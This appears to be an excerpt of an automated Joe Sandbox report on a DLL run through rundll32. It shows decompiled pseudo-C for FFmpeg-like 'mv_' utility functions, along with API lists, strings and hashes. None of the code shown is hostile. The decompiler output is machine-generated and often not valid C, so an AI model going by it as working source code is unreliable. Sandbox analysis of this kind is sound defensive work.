                                                      • Instruction Fuzzy Hash: 3421DBB5604701CFD704EF25D5C591ABBF4FF89280F06C969E8898B31AE731E985CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 18%
                                                      			E10012239(intOrPtr __edi, intOrPtr* __esi, char* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a40, char _a44, char _a61, char _a64, intOrPtr* _a1120, intOrPtr _a1124) {
                                                      				signed int _t34;
                                                      				char* _t49;
                                                      				intOrPtr* _t51;
                                                      				intOrPtr _t56;
                                                      				void* _t57;
                                                      				intOrPtr* _t60;
                                                      				char* _t64;
                                                      				intOrPtr* _t66;
                                                      
                                                      				_t60 = __esi;
                                                      				_t56 = __edi;
                                                      				_a8 = 0xffffffff;
                                                      				_t49 =  &_a64;
                                                      				_a4 = 0x40;
                                                      				_t64 =  &_a61;
                                                      				 *_t66 = _t49;
                                                      				E10008880(_t49, __edi, __esi, _t64);
                                                      				_t34 = 0;
                                                      				_t51 = _t60;
                                                      				_a1124 = _t56;
                                                      				_t57 = 0;
                                                      				if( *_t51 > 0) {
                                                      					while(1) {
                                                      						_t60 =  *((intOrPtr*)(_t51 + 4)) + _t34 * 8;
                                                      						if(_t60 == 0) {
                                                      							goto L5;
                                                      						}
                                                      						if(_t57 != 0) {
                                                      							 *_t66 = _t49;
                                                      							_a8 = 1;
                                                      							_a4 =  &_a40;
                                                      							_a1120 = _t51;
                                                      							L10008F30();
                                                      							_t51 = _a1120;
                                                      						}
                                                      						_a8 = _t64;
                                                      						_a12 = 1;
                                                      						_t57 = _t57 + 1;
                                                      						_a16 = 0;
                                                      						_a1120 = _t51;
                                                      						 *_t66 = _t49;
                                                      						_a4 =  *_t60;
                                                      						E10009730();
                                                      						_a8 = 1;
                                                      						_a4 =  &_a44;
                                                      						 *_t66 = _t49;
                                                      						L10008F30();
                                                      						_a16 = 0;
                                                      						_a12 = 1;
                                                      						_a8 = _t64;
                                                      						 *_t66 = _t49;
                                                      						_a4 =  *((intOrPtr*)(_t60 + 4));
                                                      						E10009730();
                                                      						_t51 = _a1120;
                                                      						_t34 = _t60 + 1;
                                                      						if( *_t51 > _t34) {
                                                      							continue;
                                                      						}
                                                      						goto L5;
                                                      					}
                                                      				}
                                                      				L5:
                                                      				 *_t66 = _t49;
                                                      				_a4 = _a1124;
                                                      				return E10009690(_t49, _t51, _a1124, _t60);
                                                      			}












                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_bprint_append_datamv_bprint_escape$mv_bprint_finalizemv_bprint_init
                                                      • String ID:
                                                      • API String ID: 3283265872-0
                                                      • Opcode ID: 40e4fae6fe95c9ae0cafae5e4cfbe44df76d706b7c6edfb7b55f5239210fc438
                                                      • Instruction ID: 90910876c942d1fbafe524e13dc9732c176e9ecd8d18a9c8de127334b5e1fd1f
                                                      • Opcode Fuzzy Hash: 40e4fae6fe95c9ae0cafae5e4cfbe44df76d706b7c6edfb7b55f5239210fc438
                                                      • Instruction Fuzzy Hash: 6121DDB59197059FC350DF28C18025AFBE1FF88354F51892EE99D87351E736E982CB82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 42%
                                                      			E10011483(void* __eax, intOrPtr* __ebx, void* __ecx, void* __eflags) {
                                                      				intOrPtr* _t60;
                                                      
                                                      				 *__esp = __eax;
                                                      				__edi = __eax;
                                                      				__esp[7] = __ecx;
                                                      				__eax = strlen(??);
                                                      				__ecx = __esp[7];
                                                      				 *__esp = __esp[7];
                                                      				__esi = __eax;
                                                      				__eax = strlen(??);
                                                      				 *__esp = __edi;
                                                      				__edx = __eax;
                                                      				__esp[7] = __eax;
                                                      				_t26 = __eax + 1; // 0x1
                                                      				__eax = __esi + _t26;
                                                      				__esp[1] = __esi + _t26;
                                                      				__eax = E10026280();
                                                      				if(__eax != 0) {
                                                      					__edx = __esp[7];
                                                      					__edi = __eax + __esi;
                                                      					__esi = __esp[0xb];
                                                      					__ecx = __edx + 1;
                                                      					if(__ecx >= 8) {
                                                      						if((__edi & 0x00000001) != 0) {
                                                      							__ecx =  *__esi & 0x000000ff;
                                                      							__edi = __edi + 1;
                                                      							__esi = __esi + 1;
                                                      							 *((char*)(__edi - 1)) = __cl;
                                                      							__ecx = __edx;
                                                      						}
                                                      						if((__edi & 0x00000002) != 0) {
                                                      							__edx =  *__esi & 0x0000ffff;
                                                      							__edi = __edi + 2;
                                                      							__esi = __esi + 2;
                                                      							__ecx = __ecx - 2;
                                                      							 *((short*)(__edi - 2)) = __dx;
                                                      						}
                                                      						if((__edi & 0x00000004) != 0) {
                                                      							__edx =  *__esi;
                                                      							__edi = __edi + 4;
                                                      							__esi = __esi + 4;
                                                      							__ecx = __ecx - 4;
                                                      							 *(__edi - 4) = __edx;
                                                      						}
                                                      					}
                                                      					__esp[7] = __eax;
                                                      					__edx =  &(__esp[0xb]);
                                                      					__eax = memcpy(__edi, __esi, __ecx);
                                                      					__esi + __ecx = __esi + __ecx + __ecx;
                                                      					__ecx = 0;
                                                      					E100265C0(__edx);
                                                      					__eax = __esp[7];
                                                      					__esp[0xb] = __esp[7];
                                                      					__eax =  *__ebp;
                                                      					 *__esp =  *__ebp;
                                                      					L100265B0();
                                                      					__eax =  *__ebx;
                                                      					__ecx = __ebx[1];
                                                      					_t8 = __eax - 1; // -1
                                                      					__esi = _t8;
                                                      					 *__ebx = __esi;
                                                      					__eax =  *(__ecx + __esi * 8);
                                                      					__edx =  *(__ecx + 4 + __esi * 8);
                                                      					 *__ebp =  *(__ecx + __esi * 8);
                                                      					__ebp[1] =  *(__ecx + 4 + __esi * 8);
                                                      					__eax = __esp[0xb];
                                                      					if(__eax == 0) {
                                                      						if(__esi == 0) {
                                                      							E100265C0(__ebx);
                                                      							__eax = __esp[0x14];
                                                      							E100265C0(__esp[0x14]);
                                                      						}
                                                      						__eax =  &(__esp[0xa]);
                                                      						__esi = 0;
                                                      						E100265C0( &(__esp[0xa]));
                                                      						goto L4;
                                                      					} else {
                                                      						__edx = __ecx + __esi * 8;
                                                      						__ecx = __esp[0xa];
                                                      						__esi = __esi + 1;
                                                      						 *(__edx + 4) = __eax;
                                                      						 *__edx = __esp[0xa];
                                                      						 *__ebx = __esi;
                                                      						__esi = 0;
                                                      						L4:
                                                      						return 0xfffffff4;
                                                      					}
                                                      				}
                                                      				if( *__ebx == 0) {
                                                      					 *_t60 = __ebx + 4;
                                                      					E100265C0();
                                                      					 *_t60 =  *((intOrPtr*)(_t60 + 0x50));
                                                      					E100265C0();
                                                      				}
                                                      				 *_t60 =  *((intOrPtr*)(_t60 + 0x28));
                                                      				L100265B0();
                                                      				 *_t60 =  *((intOrPtr*)(_t60 + 0x2c));
                                                      				L100265B0();
                                                      				goto L4;
                                                      			}





                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: strlen$_aligned_reallocmv_freepmv_realloc
                                                      • String ID:
                                                      • API String ID: 895301365-0
                                                      • Opcode ID: 04da3bf766d47488039e948dce66939b5b65f249d2add762eec63dcc3e51c44d
                                                      • Instruction ID: 51621a72b6bbd22e45abe63bff26c18dabce81ca6188ceac0dc85253792fa2d5
                                                      • Opcode Fuzzy Hash: 04da3bf766d47488039e948dce66939b5b65f249d2add762eec63dcc3e51c44d
                                                      • Instruction Fuzzy Hash: F121B3B8908712CFCB14DF24C48055AB7E5FF89344F458A5EE9999B305E731EA46CF82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Similarity
                                                      • API ID: _lock_unlockcalloc
                                                      • String ID:
                                                      • API String ID: 3876498383-0
                                                      • Opcode ID: 357fb2442f9bcdd85ef6b46d033be08ae312da071a22b7525909557a6230c189
                                                      • Instruction ID: 6cddb97a3fd8d0d05461b53b71359434b8c1691dc6b4f2f6cc4d1d10a1eaf7a4
                                                      • Opcode Fuzzy Hash: 357fb2442f9bcdd85ef6b46d033be08ae312da071a22b7525909557a6230c189
                                                      • Instruction Fuzzy Hash: BF115E75544201CFDB40EF78C59071ABBE4FF84250F16896AD98CCF249EB74D840EBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • mv_bprint_escape.MAIN ref: 100122B3
                                                        • Part of subcall function 10009730: mv_bprintf.MAIN(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 100097FB
                                                      • mv_bprint_append_data.MAIN ref: 100122CC
                                                      • mv_bprint_escape.MAIN ref: 100122EE
                                                      • mv_bprint_finalize.MAIN ref: 1001231B
                                                      • mv_bprint_append_data.MAIN ref: 1001234B
                                                        • Part of subcall function 10008F30: mv_realloc.MAIN ref: 10008F73
                                                      Similarity
                                                      • API ID: mv_bprint_append_datamv_bprint_escape$mv_bprint_finalizemv_bprintfmv_realloc
                                                      • String ID:
                                                      • API String ID: 1942445456-0
                                                      • Opcode ID: 5e9e0b7bf5f3d5346bbbc040ec1caf168d6988dfb1b18155a4329e28a55b4eeb
                                                      • Instruction ID: 403ebcfaa7f6bf6d2df9c5cc3f9910434a712b72dc8362acc2447b37bc06364c
                                                      • Opcode Fuzzy Hash: 5e9e0b7bf5f3d5346bbbc040ec1caf168d6988dfb1b18155a4329e28a55b4eeb
                                                      • Instruction Fuzzy Hash: 752199B59183019FD360DF29C08069AFBE1FB89348F50892EE58CC7301E736E981CB46
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Similarity
                                                      • API ID: _errno$strtol
                                                      • String ID:
                                                      • API String ID: 3596500743-0
                                                      • Opcode ID: 94420cbffd51064d18b4594c717699c8f84a31741584a0f27c6857c5b8a8326f
                                                      • Instruction ID: e5a68f2e7340340f2a0c1abd8e62d28df7ecd48bc61271be75172e8c5bb86d30
                                                      • Opcode Fuzzy Hash: 94420cbffd51064d18b4594c717699c8f84a31741584a0f27c6857c5b8a8326f
                                                      • Instruction Fuzzy Hash: CD01E474A0931A9FD744EF65C88871ABBE2FF85740F55C86DE88987724EB74E8408B42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 43%
                                                      			E1004B020(void* __edi, void* __ebp, void* __eflags, intOrPtr* _a4) {
                                                      				char _v20;
                                                      				char* _v36;
                                                      				intOrPtr* _v40;
                                                      				char _v44;
                                                      				void* __ebx;
                                                      				void* __esi;
                                                      				char _t10;
                                                      				intOrPtr* _t14;
                                                      				char _t18;
                                                      				intOrPtr* _t21;
                                                      
                                                      				_t14 = _a4;
                                                      				_t18 = _t14 + 4;
                                                      				_v44 = _t18;
                                                      				L1009DE58();
                                                      				_t21 =  &_v36 - 4;
                                                      				 *_t21 =  *_t14;
                                                      				_t10 = L10017F10();
                                                      				_v20 = _t10;
                                                      				if( *((intOrPtr*)(_t14 + 0x1c)) != 0) {
                                                      					_v40 = _t14;
                                                      					_v36 =  &_v20;
                                                      					_v44 = 0x1004aba0;
                                                      					 *_t21 =  *_t14;
                                                      					_t10 = E100186C0(_t14, __edi, _t18);
                                                      				}
                                                      				 *_t21 = _t14 + 0xc;
                                                      				__imp__WakeAllConditionVariable();
                                                      				 *((intOrPtr*)(_t21 - 4)) = _t18;
                                                      				L1009DE50();
                                                      				return _t10;
                                                      			}














                                                      APIs
                                                      • AcquireSRWLockExclusive.KERNEL32 ref: 1004B02F
                                                      • mv_fifo_can_read.MAIN ref: 1004B03C
                                                      • mv_fifo_read_to_cb.MAIN ref: 1004B066
                                                      • WakeAllConditionVariable.KERNEL32 ref: 1004B071
                                                      • ReleaseSRWLockExclusive.KERNEL32 ref: 1004B07D
                                                      Similarity
                                                      • API ID: ExclusiveLock$AcquireConditionReleaseVariableWakemv_fifo_can_readmv_fifo_read_to_cb
                                                      • String ID:
                                                      • API String ID: 93134951-0
                                                      • Opcode ID: b04aa90755bf11445e363e889d079bebaf352ae153b96380cc2547109b9fea1a
                                                      • Instruction ID: f622ea8ca44b4a077811579624edcdfc0bd4128ea1142ae48ea321c74ce907da
                                                      • Opcode Fuzzy Hash: b04aa90755bf11445e363e889d079bebaf352ae153b96380cc2547109b9fea1a
                                                      • Instruction Fuzzy Hash: D5F0B6F5908A109FCB40FF39E5C550ABBE0EF45644F41892DF8898B209E634E595CB93
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 10028D90: strcmp.MSVCRT ref: 10028DC8
                                                        • Part of subcall function 10028D90: strcmp.MSVCRT ref: 10028DE8
                                                      • mv_log.MAIN ref: 1002A471
                                                      Strings
                                                      • Value %f for parameter '%s' out of range [%g - %g], xrefs: 1002A44E
                                                      • Value %f for parameter '%s' is not a valid set of 32bit integer flags, xrefs: 1002A41D
                                                      Similarity
                                                      • API ID: strcmp$mv_log
                                                      • String ID: Value %f for parameter '%s' is not a valid set of 32bit integer flags$Value %f for parameter '%s' out of range [%g - %g]
                                                      • API String ID: 2835281190-116802341
                                                      • Opcode ID: 307d38743698b291979d8cba9ea0ea86772061f596d5267834f9e20a1e2d30a9
                                                      • Instruction ID: 36e62bc8f0de24f566176e25824a2ed98854e2226bbbd516fe818f77359d1b1a
                                                      • Opcode Fuzzy Hash: 307d38743698b291979d8cba9ea0ea86772061f596d5267834f9e20a1e2d30a9
                                                      • Instruction Fuzzy Hash: 5D71AC35918F45CBC382DF38E48111AFBA5FFDB2E0F91971AF8966A250DB3084C19742
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 34%
                                                      			E100204C0(signed int __edx, void* __eflags, char _a4, signed int* _a8, signed int _a12, char _a16, char* _a20, char _a24, signed int _a28) {
                                                      				signed int _v4;
                                                      				intOrPtr _v8;
                                                      				char* _v12;
                                                      				signed int* _v16;
                                                      				intOrPtr _v32;
                                                      				char* _v36;
                                                      				char _v40;
                                                      				char _v44;
                                                      				char _v48;
                                                      				char _v52;
                                                      				char* _v56;
                                                      				char _v60;
                                                      				signed int _v64;
                                                      				signed int _v68;
                                                      				signed int* _v72;
                                                      				char _v92;
                                                      				char* _v96;
                                                      				char* _v100;
                                                      				char* _v104;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				signed int __esi;
                                                      				void* __ebp;
                                                      				void* _t107;
                                                      				signed int _t108;
                                                      				signed int _t115;
                                                      				char* _t138;
                                                      				signed int _t143;
                                                      				intOrPtr _t148;
                                                      				void* _t149;
                                                      				signed int* _t150;
                                                      				char _t152;
                                                      				intOrPtr _t161;
                                                      				intOrPtr _t162;
                                                      				signed int _t163;
                                                      				signed int _t171;
                                                      				char _t176;
                                                      				intOrPtr _t177;
                                                      				intOrPtr _t178;
                                                      				void* _t180;
                                                      				intOrPtr _t186;
                                                      				void* _t187;
                                                      				char* _t188;
                                                      				char* _t190;
                                                      				void* _t192;
                                                      				void* _t193;
                                                      				signed int _t195;
                                                      				intOrPtr _t198;
                                                      				void* _t199;
                                                      				signed int** _t200;
                                                      
                                                      				_t163 = __edx;
                                                      				_t200 = _t199 - 0x5c;
                                                      				 *_t200 = 0xffffffff;
                                                      				_t188 = _a20;
                                                      				_t150 = _a8;
                                                      				_t195 = _a28;
                                                      				_v52 = _a4;
                                                      				_v104 = _t188;
                                                      				_v48 = _a12;
                                                      				_v56 = _a16;
                                                      				_v60 = _a24;
                                                      				_v40 = 0x100b3560;
                                                      				_v36 = 0;
                                                      				_v32 = 0;
                                                      				_v100 = 0;
                                                      				_t107 = L1001E960(__eflags, _t149, _t187, _t180);
                                                      				asm("cdq");
                                                      				_t205 = 0 - _t107;
                                                      				asm("sbb edi, edx");
                                                      				if(0 >= _t107) {
                                                      					0 = (0 << 0x00000020 | __esi) << 3;
                                                      					__eflags = __esi << 3;
                                                      				}
                                                      				_t108 = _t107 + 0x400;
                                                      				_v68 = _t108;
                                                      				asm("adc edx, 0x0");
                                                      				__eflags = _t188;
                                                      				_v64 = _t163;
                                                      				_v60 = _t108 & 0xffffff00 | _v60 <= 0x00000000 | _t163 & 0xffffff00 | _t188 <= 0x00000000;
                                                      				if((_t108 & 0xffffff00 | _v60 <= 0x00000000 | _t163 & 0xffffff00 | _t188 <= 0x00000000) != 0) {
                                                      					L20:
                                                      					_v96 = _t188;
                                                      					_v104 = 0x10;
                                                      					_v92 = _v60;
                                                      					_v100 = "Picture size %ux%u is invalid\n";
                                                      					 *_t200 =  &_v40;
                                                      					L10023A40();
                                                      					_t115 = 0xffffffea;
                                                      					goto L21;
                                                      				} else {
                                                      					__eflags = 0x7ffffffe - _v68;
                                                      					asm("sbb ecx, edx");
                                                      					if(0x7ffffffe < _v68) {
                                                      						goto L20;
                                                      					} else {
                                                      						__eflags = 0x7ffffffe - (_v60 + 0x80) * _v68;
                                                      						asm("sbb edi, edx");
                                                      						if(__eflags < 0) {
                                                      							goto L20;
                                                      						} else {
                                                      							_v100 = _t188;
                                                      							_t190 = _v56;
                                                      							 *_t200 = _t150;
                                                      							_v104 = _t190;
                                                      							_t115 = L1001EAB0(__eflags);
                                                      							__eflags = _t115;
                                                      							if(__eflags < 0) {
                                                      								L21:
                                                      								return _t115;
                                                      							} else {
                                                      								_t171 =  ~_t195;
                                                      								 *_t150 =  *_t150 + _t195 - 0x00000001 & _t171;
                                                      								_t150[1] = _t150[1] + _t195 - 0x00000001 & _t171;
                                                      								_t150[2] = _t150[2] + _t195 - 0x00000001 & _t171;
                                                      								_t150[3] = _t150[3] + _t195 - 0x00000001 & _t171;
                                                      								_a20 = _t150;
                                                      								_a8 = _t190;
                                                      								_a16 = _v48;
                                                      								_a12 = _v60;
                                                      								_a4 = _v52;
                                                      								_t200 =  &(_t200[0x17]);
                                                      								_pop(_t150);
                                                      								_pop(_t188);
                                                      								_pop(0);
                                                      								_pop(_t195);
                                                      								_v16 = _t150;
                                                      								_t152 = _a4;
                                                      								_v12 = _t188;
                                                      								_t138 = _a20;
                                                      								_v8 = 0;
                                                      								_v4 = _t195;
                                                      								 *_t152 = 0;
                                                      								 *((intOrPtr*)(_t152 + 4)) = 0;
                                                      								 *((intOrPtr*)(_t152 + 8)) = 0;
                                                      								 *((intOrPtr*)(_t152 + 0xc)) = 0;
                                                      								_v60 =  *_t138;
                                                      								_v56 = _t138[4];
                                                      								_v64 =  &_v60;
                                                      								_v52 = _t138[8];
                                                      								_v48 = _t138[0xc];
                                                      								_v68 = _a12;
                                                      								_v72 = _a8;
                                                      								 *((intOrPtr*)(_t200 - 0x4c)) =  &_v44;
                                                      								_t143 = L1001EE90(_t152, 0, _t188, _t195, _t205);
                                                      								if(_t143 >= 0) {
                                                      									_t161 = _v44;
                                                      									if(_t161 < 0) {
                                                      										L13:
                                                      										_t143 = 0xffffffea;
                                                      									} else {
                                                      										_t186 = _v40;
                                                      										if(0x7fffffff - _t161 < _t186) {
                                                      											goto L13;
                                                      										} else {
                                                      											_t198 = _v36;
                                                      											_t192 = _t161 + _t186;
                                                      											if(0x7fffffff - _t192 < _t198) {
                                                      												goto L13;
                                                      											} else {
                                                      												_t148 = _v32;
                                                      												_t193 = _t192 + _t198;
                                                      												if(0x7fffffff - _t193 < _t148) {
                                                      													goto L13;
                                                      												} else {
                                                      													if(_a16 != 0) {
                                                      														_t176 = _a16;
                                                      														 *_t152 = _t176;
                                                      														if(_t186 != 0) {
                                                      															_t162 = _t161 + _t176;
                                                      															 *((intOrPtr*)(_t152 + 4)) = _t162;
                                                      															_t177 = _t162;
                                                      															if(_t198 != 0) {
                                                      																_t178 = _t177 + _t186;
                                                      																 *((intOrPtr*)(_t152 + 8)) = _t178;
                                                      																if(_t148 != 0) {
                                                      																	 *((intOrPtr*)(_t152 + 0xc)) = _t178 + _t198;
                                                      																}
                                                      															}
                                                      														}
                                                      													}
                                                      													_t143 = _t148 + _t193;
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      								return _t143;
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      			}

                                                      APIs
                                                      • mv_image_get_linesize.MAIN ref: 10020524
                                                        • Part of subcall function 1001E960: mv_pix_fmt_desc_get.MAIN(?,?,?,?,?,?,?,?,?,?,00000000,?,100B3560,00000000,1001F6E8), ref: 1001E976
                                                      • mv_image_fill_linesizes.MAIN(?), ref: 100205B2
                                                      Strings
                                                      • Picture size %ux%u is invalid, xrefs: 10020635
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_image_fill_linesizesmv_image_get_linesizemv_pix_fmt_desc_get
                                                      • String ID: Picture size %ux%u is invalid
                                                      • API String ID: 547003755-1963597007
                                                      • Opcode ID: 55cc673a7fd8fa65950412ae644b1255500889416eca15a6256c6aad94377d03
                                                      • Instruction ID: 76d0c1c0ea3a07b63bf36c4eb498433e90d4a1915968e7ac4ed20e6f6339bb64
                                                      • Opcode Fuzzy Hash: 55cc673a7fd8fa65950412ae644b1255500889416eca15a6256c6aad94377d03
                                                      • Instruction Fuzzy Hash: 73412576A097508FC350CF29D88074ABBE2FFC8610F558A2EF9A8CB351E634D8418F42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      • Value %f for parameter '%s' out of range [%g - %g], xrefs: 100284E1
                                                      • Value %f for parameter '%s' is not a valid set of 32bit integer flags, xrefs: 10028528
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_log
                                                      • String ID: Value %f for parameter '%s' is not a valid set of 32bit integer flags$Value %f for parameter '%s' out of range [%g - %g]
                                                      • API String ID: 2418673259-116802341
                                                      • Opcode ID: 0e86dea9d7dbfb0fa736b3973e9ea318f8df20d9c4df400857962a6312e3acc6
                                                      • Instruction ID: 4b2a81cc611bfd366bf19134ab3879e08e1fa9318fff0f4b80787780fc68846e
                                                      • Opcode Fuzzy Hash: 0e86dea9d7dbfb0fa736b3973e9ea318f8df20d9c4df400857962a6312e3acc6
                                                      • Instruction Fuzzy Hash: A0414A3581AF958BC382DF38909111BF7E4FFDA380F819B5EF88676652C73095428742
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E1000D684(void* __edi) {
                                                      				void* _t75;
                                                      
                                                      				while(1) {
                                                      					L16:
                                                      					__eax =  *(__edi + 8);
                                                      					__ebx = __ebp;
                                                      					__edx =  *(__edi + 0xc);
                                                      					__esp[4] =  *(__edi + 8);
                                                      					__esp[5] =  *(__edi + 0xc);
                                                      					while(1) {
                                                      						__esp[7] = __ebp;
                                                      						__eax = __esp[4];
                                                      						__ecx = 0;
                                                      						__edx = __esp[5];
                                                      						__ebp = __edi;
                                                      						do {
                                                      							L20:
                                                      							__edi = __edx;
                                                      							__esi = __eax;
                                                      							__esi = (__edi << 0x00000020 | __eax) >> __cl;
                                                      							__edi = __edi >> __cl;
                                                      							if((__cl & 0x00000020) != 0) {
                                                      								__esi = __edi;
                                                      							}
                                                      							__esi = __esi & 0x00000001;
                                                      							if(__esi == 0) {
                                                      								goto L19;
                                                      							}
                                                      							_t31 = __ebx - 1; // 0x0
                                                      							__esi = _t31;
                                                      							if(__ebx != 0) {
                                                      								__ebx = __esi;
                                                      								goto L19;
                                                      							}
                                                      							__edi = __ebp;
                                                      							__ebp = __esp[7];
                                                      							if(__ebp != 0) {
                                                      								__esp[4] = __ecx;
                                                      								__eax = 0x100aeacf;
                                                      								__esp[1] = 0x100aeacf;
                                                      								__eax = __esp[6];
                                                      								 *__esp = __esp[6];
                                                      								__eax = L100089C0();
                                                      								__ecx = __esp[4];
                                                      								L38:
                                                      								if(__ecx <= 0x28) {
                                                      									L26:
                                                      									__eax =  *(0x100af280 + __ecx * 8);
                                                      									if(__eax == 0) {
                                                      										L32:
                                                      										__esp[2] = __ecx;
                                                      										__eax = __esp[6];
                                                      										__ebx = "USR%d";
                                                      										__esp[1] = "USR%d";
                                                      										 *__esp = __esp[6];
                                                      										__eax = L100089C0();
                                                      										L10:
                                                      										while(1) {
                                                      											L10:
                                                      											if( *__edi != 2) {
                                                      												L3:
                                                      												__esi =  *(__edi + 4);
                                                      												__ebp = __ebp + 1;
                                                      												if(__esi <= __ebp) {
                                                      													L14:
                                                      													if(__esi == 0) {
                                                      														__eax = 0;
                                                      														__esp[2] = 0;
                                                      														__eax = "%d channels";
                                                      														__esp[1] = "%d channels";
                                                      														__eax = __esp[6];
                                                      														 *__esp = __esp[6];
                                                      														L100089C0() = 0;
                                                      													} else {
                                                      														__eax = __esp[6];
                                                      														__edx = 0x100aead1;
                                                      														__esp[1] = 0x100aead1;
                                                      														 *__esp = __esp[6];
                                                      														L100089C0() = 0;
                                                      													}
                                                      													return _t75;
                                                      												}
                                                      												L4:
                                                      												if(__ebp >= __esi) {
                                                      													L42:
                                                      													__eax = 0x100aeacf;
                                                      													__esp[1] = 0x100aeacf;
                                                      													__eax = __esp[6];
                                                      													 *__esp = __esp[6];
                                                      													__eax = L100089C0();
                                                      													L9:
                                                      													__eax = __esp[6];
                                                      													__esi = "NONE";
                                                      													__esp[1] = "NONE";
                                                      													 *__esp = __esp[6];
                                                      													__eax = L100089C0();
                                                      													continue;
                                                      												}
                                                      												__eax =  *__edi;
                                                      												if(__eax == 2) {
                                                      													__edx =  *(__edi + 8);
                                                      													__eax = __ebp + __ebp * 2;
                                                      													__eax =  *(__edi + 8) + (__ebp + __ebp * 2) * 8;
                                                      													__ecx =  *( *(__edi + 8) + (__ebp + __ebp * 2) * 8);
                                                      													__ebx = __ecx - 0x400;
                                                      													if(__ebp != 0) {
                                                      														__esp[4] = __ecx;
                                                      														__eax = 0x100aeacf;
                                                      														__esp[1] = 0x100aeacf;
                                                      														__eax = __esp[6];
                                                      														 *__esp = __esp[6];
